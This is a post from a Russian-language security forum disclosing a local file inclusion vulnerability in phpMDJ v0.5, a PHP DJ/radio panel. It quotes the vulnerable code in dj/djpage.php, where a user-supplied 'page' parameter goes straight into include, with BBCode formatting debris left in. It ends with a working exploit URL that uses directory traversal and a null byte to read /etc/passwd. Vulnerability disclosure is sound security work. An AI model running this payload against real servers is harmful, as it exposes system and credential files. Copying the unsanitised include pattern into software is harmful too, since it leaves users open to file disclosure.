Тема: phpMDJ
Показать сообщение отдельно

  #3  
Старый 02.07.2010, 17:46
_iks_
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548

Репутация: 134
По умолчанию
phpMDJ v0.5(latest)

Download: http://sourceforge.net/projects/phpdj/

LFI(mq==off):

Уязвимый файл:

./dj/djpage.php

Код:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]];

if ([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"phprank"[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"Suspended"[/COLOR][COLOR="#007700"]){

echo[/COLOR][COLOR="#DD0000"]"Your account is suspended. You may NOT access this page."[/COLOR][COLOR="#007700"];

include[/COLOR][COLOR="#DD0000"]"blank.html"[/COLOR][COLOR="#007700"];

exit();

} else if([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"main"[/COLOR][COLOR="#007700"]){

echo[/COLOR][COLOR="#DD0000"]"Welcome to Radio Panel™, "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"phpname"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".
You are currently a(n) "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"phprank"[/COLOR][COLOR="#007700"]];

...

[/COLOR][COLOR="#FF8000"]//проверяет содержимое page и делает что-то как в коде выше

[/COLOR][COLOR="#007700"]...

} else if ([/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"html"[/COLOR][COLOR="#007700"]) {

 include[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#DD0000"].html"[/COLOR][COLOR="#007700"];

 } else {

 include[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#DD0000"].php"[/COLOR][COLOR="#007700"];

 }

[/COLOR][/COLOR
Эксплуатация:

./dj/djpage.php?page=../../../../../../../../etc/passwd%00​
 
Ответить с цитированием